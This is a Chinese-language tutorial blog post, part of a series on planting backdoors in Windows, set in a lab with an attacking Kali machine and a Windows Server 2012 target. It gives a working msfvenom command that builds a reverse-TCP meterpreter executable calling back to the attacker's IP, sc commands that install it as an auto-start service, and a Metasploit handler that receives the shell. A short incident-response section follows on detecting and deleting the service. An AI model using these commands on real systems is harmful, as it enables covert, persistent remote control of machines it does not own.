Windows留后门--教程(三)——Windows服务后门
一、Windows服务后门介绍
在Windows系统中还有一个重要的机制,就是服务。通常大部分的服务都拥有SYSTEM权限,如果攻击者利用Windows的服务机制创建一个后门服务,那么这个后门将比一般的持久化方法更为强健。
二、Windows服务后门-教程
前提条件: 假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器administrator权限
靶机: windows Server2012
IP: 192.168.226.128
攻击机: kali
IP: 192.168.226.131
2.1 利用MSF生成一个EXE类型的后门木马
命令:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.226.131 lport=8888 -f exe -o wxiaoge.exe
#lhost是我们的主机ip,lport是我们主机的用于监听的端口
2.2 创建后门自启动服务
创建名字为ceshi的自启动服务命令:
sc create "ceshi" binpath= "C:\Users\Administrator\Desktop\wxiaoge.exe"
sc description "ceshi" "ceshi" #设置服务的描述字符串
sc config "ceshi" start= auto #设置这个服务为自动启动
net start "ceshi" #启动服务
2.3 监听返回的shell
在kali上监听端口8888,马上就接收到目标机弹回来的shell,且目标机每次重启都会启动 ceshi 服务。
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.226.131
set lport 8888
exploit
三、Windows服务后门——应急响应发现
3.1 查看网络连接
使用 TCPView 工具查看网络连接,未发现异常的连接,如下图所示,看来这个方法不能用了
3.2 查看服务器上所有的程序和服务
首先查看 everything(所有项目,意思是:全部的开机自启动项都在这)
然后查看 服务(意思是:全部的服务都在这)
查看这两处发现,有三个进程是可疑的“粉红色”
接下来查看所有的“粉红色”的程序,并且将程序放在微步云沙箱去检测,经检测发现c:\users\administrator\desktop\wxiaoge.exe文件为后门木马
注意:
粉色: 表示该条目对应的应用没有数字签名、签名不匹配或者没有发行商信息(可疑程序一般都是粉色)
黄色: 表示该启动条目对应的文件已经不存在了(可疑程序也可能是黄色)
绿色: 表示与之前保存的启动项配置比较,对比出来的差异将以绿色高亮进行显示。
处置:
1、删除ceshi服务和c:\users\administrator\desktop\wxiaoge.exe文件
更多资源:
1、web安全工具、渗透测试工具
2、存在漏洞的网站源码与代码审计+漏洞复现教程、
3、渗透测试学习视频、应急响应学习视频、代码审计学习视频、都是2019-2021年期间的较新视频
4、应急响应真实案例复现靶场与应急响应教程
收集整理在知识星球,可加入知识星球进行查看。也可搜索关注微信公众号:W小哥
Windows留后门--教程(三)——Windows服务后门相关推荐
- 微软官方windows系统下载教程(Windows 10、8.1、7)
百度关键词"下载Windows光盘映像(ISO 文件)",找到[下载Windows X光盘映像(ISO 文件)]的标题,点开查看链接,如果microsoft.com域名的链接,则说 ...
- Windows留后门--教程(二)——Windows计划任务后门
一.Windows计划任务后门介绍 计划任务是经常被攻击者拿来利用的控制点,计划任务可以让目标主机在特定的时间执行我们预先准备的后门程序从而帮助我们进行权限维持. 二.Windows计划任务后门-教程 ...
- Windows留后门--教程(五)——shift粘贴键后门
一.shift粘贴键后门介绍 Shift粘滞键是当用户连按5次shift就会自动弹出的一个程序,其实不光是粘滞键,还有各种辅助功能,这类辅助功能都拥有一个特点就是当用户未进行登录时也可以触发.所以攻击 ...
- LINUX留后门--教程(六)—— PAM后门
一.本教程作用 1.用在攻击的途径上 2.应急响应过程中,黑客会留后门,如果你连这种留后门方法都不会,怎么去应急? 不知攻,焉知防 二.PAM后门-教程 前提条件: 假设在攻击的过程中通过利用各种ge ...
- Windows Server 2012开启远程桌面服务及授权多终端用户同时登录的详细教程
一.前言 本教程适用于Windows Server 2012 R2系统版本: 本教程适用的情景为:需要对服务器开启长期.稳定.且不限制连接数的远程功能,即多用户.多终端可以同时远程登录到这一台服务器中 ...
- Windows Server 2019服务器远程桌面服务部署+深度学习环境配置教程
文章目录 1.安装Windows Server 2019 2.开启WLAN服务 3.固定IP地址 4.开启远程桌面服务 4.1 添加远程桌面服务 4.2 激活服务器 4.3 安装许可证 5.配置远程桌 ...
- LINUX留后门--教程(七)—— alias 后门
一. alias 简介 alias 命令的功能: 为命令设置别名. 比如: 每次输入 ls 命令的时候都能实现 ls -al alias ls = 'ls -al' 注意: 对于通过ssh远程登录的用 ...
- Windows编译安装AzerothCore魔兽世界开源服务端Lua脚本引擎Eluna和防作弊anticheat模块教程
Windows编译安装AzerothCore魔兽世界开源服务端Lua脚本引擎Eluna和防作弊anticheat模块教程 大家好,我是艾西今天和大家聊聊魔兽世界游戏内的脚步以及防作弊模块 Eluna是 ...
- 服务级后门自己做——创建服务
以往大多数的木马/后门都是通过修改系统ini文件(比如Win.ini,System.ini)或修改注册表的RUN值来实现自启动的,还有更简单的是修改Autobat.exe(老大,地球不适合你,你还是回 ...
最新文章
- phar.php error 139,composer.phar 安装出现PHP Fatal error解决办法
- Storm原理与实践--大数据技术栈14
- 自定义Scrollview--实现仿淘宝Toolbar透明度渐变效果
- Ubuntu 用vsftpd 配置FTP服务器
- LeetCode 503 Next Greater Element II(stack)
- Android Telephony分析(五) ---- TelephonyRegistry详解
- Python-类的学习
- 利用css完成表格的代码,css 表格(示例代码)
- Adobe Flex UIComponent LifeCycle
- java的handler机制_从源码解析Handler机制
- 修改 Apple ID 的国籍
- c语言实验作业感想,c语言程序报告实验总结(共10篇).docx
- OpenHarmony,一路前行,为了奇迹
- 多个正方体叠加所得立体图形的表面积
- Linux 简要大纲
- scp:Mac使用方法(文件上传与下载服务器)
- hadoop编程实战——日志分析
- 如何解决Oracle11g使用dmp命令无法导出空表问题
- artemis服务_Artemis安装
- 10、ARM嵌入式系统:加速传感器MMA8451初始化